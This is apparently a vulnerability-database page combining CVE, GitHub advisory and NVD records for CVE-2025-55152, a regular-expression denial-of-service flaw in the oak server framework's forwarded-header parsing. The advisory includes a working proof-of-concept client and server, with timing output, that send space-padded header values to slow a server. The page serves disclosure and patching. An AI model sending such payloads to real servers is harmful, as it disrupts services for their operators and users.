cvelistv5 - CVE-2025-55152

CVE-2025-55152 (GCVE-0-2025-55152)

Vulnerability from cvelistv5 – Published: 2025-08-09 01:29 – Updated: 2025-08-11 13:33

Title

oak: ReDoS in x-forwarded-proto and x-forwarded-for headers

Summary

oak is a middleware framework for Deno's native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. In versions 17.1.5 and below, it's possible to significantly slow down an oak server with specially crafted values of the x-forwarded-proto or x-forwarded-for headers.

Severity ?

5.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CWE

CWE-400 - Uncontrolled Resource Consumption
CWE-1333 - Inefficient Regular Expression Complexity

Assigner

GitHub_M

References

URL

Tags

	https://github.com/oakserver/oak/security/advisor…	x_refsource_CONFIRM
	https://github.com/oakserver/oak/commit/b60e60330…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	oakserver	oak	Affected: < 17.1.6

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-55152",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-08-11T13:33:12.274447Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-08-11T13:33:40.071Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "oak",
          "vendor": "oakserver",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 17.1.6"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "oak is a middleware framework for Deno\u0027s native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. In versions 17.1.5 and below, it\u0027s possible to significantly slow down an oak server with specially crafted values of the x-forwarded-proto or x-forwarded-for headers."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-400",
              "description": "CWE-400: Uncontrolled Resource Consumption",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-1333",
              "description": "CWE-1333: Inefficient Regular Expression Complexity",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-08-09T01:29:54.545Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9"
        },
        {
          "name": "https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44"
        }
      ],
      "source": {
        "advisory": "GHSA-r3v7-pc4g-7xp9",
        "discovery": "UNKNOWN"
      },
      "title": "oak: ReDoS in x-forwarded-proto and x-forwarded-for headers"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-55152",
    "datePublished": "2025-08-09T01:29:54.545Z",
    "dateReserved": "2025-08-07T18:27:23.305Z",
    "dateUpdated": "2025-08-11T13:33:40.071Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-55152\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-08-09T02:15:38.033\",\"lastModified\":\"2025-08-11T18:32:48.867\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"oak is a middleware framework for Deno\u0027s native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. In versions 17.1.5 and below, it\u0027s possible to significantly slow down an oak server with specially crafted values of the x-forwarded-proto or x-forwarded-for headers.\"},{\"lang\":\"es\",\"value\":\"oak es un framework de middleware para el servidor HTTP nativo de Deno, Deno Deploy, Node.js 16.5 y versiones posteriores, Cloudflare Workers y Bun. En las versiones 17.1.5 y anteriores, es posible ralentizar significativamente un servidor oak con valores especialmente manipulados de los encabezados x-forwarded-proto o x-forwarded-for.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-400\"},{\"lang\":\"en\",\"value\":\"CWE-1333\"}]}],\"references\":[{\"url\":\"https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-55152\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-08-11T13:33:12.274447Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-08-11T13:33:16.293Z\"}}], \"cna\": {\"title\": \"oak: ReDoS in x-forwarded-proto and x-forwarded-for headers\", \"source\": {\"advisory\": \"GHSA-r3v7-pc4g-7xp9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"oakserver\", \"product\": \"oak\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 17.1.6\"}]}], \"references\": [{\"url\": \"https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9\", \"name\": \"https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44\", \"name\": \"https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"oak is a middleware framework for Deno\u0027s native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. In versions 17.1.5 and below, it\u0027s possible to significantly slow down an oak server with specially crafted values of the x-forwarded-proto or x-forwarded-for headers.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-400\", \"description\": \"CWE-400: Uncontrolled Resource Consumption\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-1333\", \"description\": \"CWE-1333: Inefficient Regular Expression Complexity\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-08-09T01:29:54.545Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-55152\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-08-11T13:33:40.071Z\", \"dateReserved\": \"2025-08-07T18:27:23.305Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-08-09T01:29:54.545Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-R3V7-PC4G-7XP9

Vulnerability from github – Published: 2025-08-12 00:15 – Updated: 2025-08-12 00:15

Summary

Oak Server has ReDoS in x-forwarded-proto and x-forwarded-for headers

Details

Summary

With specially crafted value of the x-forwarded-proto or x-forwarded-for headers, it's possible to significantly slow down an oak server.

Vulnerable Code

https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L87
https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L142

PoC

setup

deno --version
deno 2.4.3
v8 13.7.152.14-rusty
typescript 5.8.3

server.ts

import { Application } from "https://deno.land/x/oak/mod.ts";

const app = new Application({proxy: true});

let i = 1

app.use((ctx) => {

    // let url = ctx.request.url   // test1) x-forwarded-proto
    let ips = ctx.request.ips   // test2) x-forwarded-for
    console.log(`request ${i} received`)
    i++;
    ctx.response.body = "hello";
});

await app.listen({ port: 8080 });

client.ts

const lengths = [2000, 4000, 8000, 16000, 32000, 64000, 128000]

const data1 = lengths.map(l => 'A' + 'A'.repeat(l) + 'A');
const data2 = lengths.map(l => 'A' + ' '.repeat(l) + 'A');

async function run(data) {
    for (let i = 0; i < data.length; i++) {
        let d = data[i];

        const start = performance.now();

        await fetch("http://localhost:8080", {
            headers: {
                // "x-forwarded-proto": d,  // test1)
                "x-forwarded-for": d,    // test2)
            },
        });

        const end = performance.now();
        console.log('length=%d, time=%d ms', d.length, end - start);
    }
}

console.log("\n[+] Test normal behavior")
await run(data1)
console.log("\n[+] Test payloads")
await run(data2)

deno run --allow-net server.ts
deno run --allow-net client.ts

[+] Test normal behavior
length=2002, time=14 ms
length=4002, time=6 ms
length=8002, time=3 ms
length=16002, time=3 ms
length=32002, time=2 ms
length=64002, time=4 ms
length=128002, time=3 ms

[+] Test payloads
length=2002, time=7 ms
length=4002, time=22 ms
length=8002, time=77 ms
length=16002, time=241 ms
length=32002, time=947 ms
length=64002, time=4020 ms
length=128002, time=15840 ms

Impact

A specially crafted value of the x-forwarded-proto or x-forwarded-for headers can be used to significantly slow down an oak server.

Similar Issues

https://github.com/denoland/deno/security/advisories/GHSA-jc97-h3h9-7xh6
- https://github.com/denoland/deno/pull/17722
https://github.com/websockets/ws/security/advisories/GHSA-6fc8-4gx4-v693
- https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff

Severity ?

5.3 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@oakserver/oak"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "14.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-55152"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-12T00:15:00Z",
    "nvd_published_at": "2025-08-09T02:15:38Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nWith specially crafted value of the\u00a0`x-forwarded-proto` or `x-forwarded-for` headers, it\u0027s possible\u00a0to significantly slow down an oak server.\n\n### Vulnerable Code\n\n- https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L87\n- https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L142\n\n### PoC\n\n- setup\n```\ndeno --version\ndeno 2.4.3\nv8 13.7.152.14-rusty\ntypescript 5.8.3\n```\n\n- `server.ts`\n```ts\nimport { Application } from \"https://deno.land/x/oak/mod.ts\";\n\nconst app = new Application({proxy: true});\n\nlet i = 1\n\napp.use((ctx) =\u003e {\n\n    // let url = ctx.request.url   // test1) x-forwarded-proto\n    let ips = ctx.request.ips   // test2) x-forwarded-for\n    console.log(`request ${i} received`)\n    i++;\n    ctx.response.body = \"hello\";\n});\n\nawait app.listen({ port: 8080 });\n```\n\n- `client.ts`\n```ts\nconst lengths = [2000, 4000, 8000, 16000, 32000, 64000, 128000]\n\nconst data1 = lengths.map(l =\u003e \u0027A\u0027 + \u0027A\u0027.repeat(l) + \u0027A\u0027);\nconst data2 = lengths.map(l =\u003e \u0027A\u0027 + \u0027 \u0027.repeat(l) + \u0027A\u0027);\n\nasync function run(data) {\n    for (let i = 0; i \u003c data.length; i++) {\n        let d = data[i];\n        \n        const start = performance.now();\n\n        await fetch(\"http://localhost:8080\", {\n            headers: {\n                // \"x-forwarded-proto\": d,  // test1)\n                \"x-forwarded-for\": d,    // test2)\n            },\n        });\n\n        const end = performance.now();\n        console.log(\u0027length=%d, time=%d ms\u0027, d.length, end - start);\n    }\n}\n\nconsole.log(\"\\n[+] Test normal behavior\")\nawait run(data1)\nconsole.log(\"\\n[+] Test payloads\")\nawait run(data2)\n```\n\n- run\n```\ndeno run --allow-net server.ts\ndeno run --allow-net client.ts\n\n[+] Test normal behavior\nlength=2002, time=14 ms\nlength=4002, time=6 ms\nlength=8002, time=3 ms\nlength=16002, time=3 ms\nlength=32002, time=2 ms\nlength=64002, time=4 ms\nlength=128002, time=3 ms\n\n[+] Test payloads\nlength=2002, time=7 ms\nlength=4002, time=22 ms\nlength=8002, time=77 ms\nlength=16002, time=241 ms\nlength=32002, time=947 ms\nlength=64002, time=4020 ms\nlength=128002, time=15840 ms\n```\n\n\n### Impact\n\nA specially crafted value of the\u00a0`x-forwarded-proto` or `x-forwarded-for` headers\u00a0 can be used to significantly slow down an oak server.\n\n### Similar Issues\n\n- https://github.com/denoland/deno/security/advisories/GHSA-jc97-h3h9-7xh6\n\t- https://github.com/denoland/deno/pull/17722\n- https://github.com/websockets/ws/security/advisories/GHSA-6fc8-4gx4-v693\n\t- https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff",
  "id": "GHSA-r3v7-pc4g-7xp9",
  "modified": "2025-08-12T00:15:00Z",
  "published": "2025-08-12T00:15:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55152"
    },
    {
      "type": "WEB",
      "url": "https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/oakserver/oak"
    },
    {
      "type": "WEB",
      "url": "https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L142"
    },
    {
      "type": "WEB",
      "url": "https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L87"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Oak Server has ReDoS in x-forwarded-proto and x-forwarded-for headers"
}

FKIE_CVE-2025-55152

Vulnerability from fkie_nvd - Published: 2025-08-09 02:15 - Updated: 2025-08-11 18:32

Severity ?

5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44
	security-advisories@github.com	https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "oak is a middleware framework for Deno\u0027s native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. In versions 17.1.5 and below, it\u0027s possible to significantly slow down an oak server with specially crafted values of the x-forwarded-proto or x-forwarded-for headers."
    },
    {
      "lang": "es",
      "value": "oak es un framework de middleware para el servidor HTTP nativo de Deno, Deno Deploy, Node.js 16.5 y versiones posteriores, Cloudflare Workers y Bun. En las versiones 17.1.5 y anteriores, es posible ralentizar significativamente un servidor oak con valores especialmente manipulados de los encabezados x-forwarded-proto o x-forwarded-for."
    }
  ],
  "id": "CVE-2025-55152",
  "lastModified": "2025-08-11T18:32:48.867",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 1.4,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-08-09T02:15:38.033",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-400"
        },
        {
          "lang": "en",
          "value": "CWE-1333"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-55152 (GCVE-0-2025-55152)

GHSA-R3V7-PC4G-7XP9

Summary

Vulnerable Code

PoC

Impact

Similar Issues

FKIE_CVE-2025-55152

Tags

Sightings

Nomenclature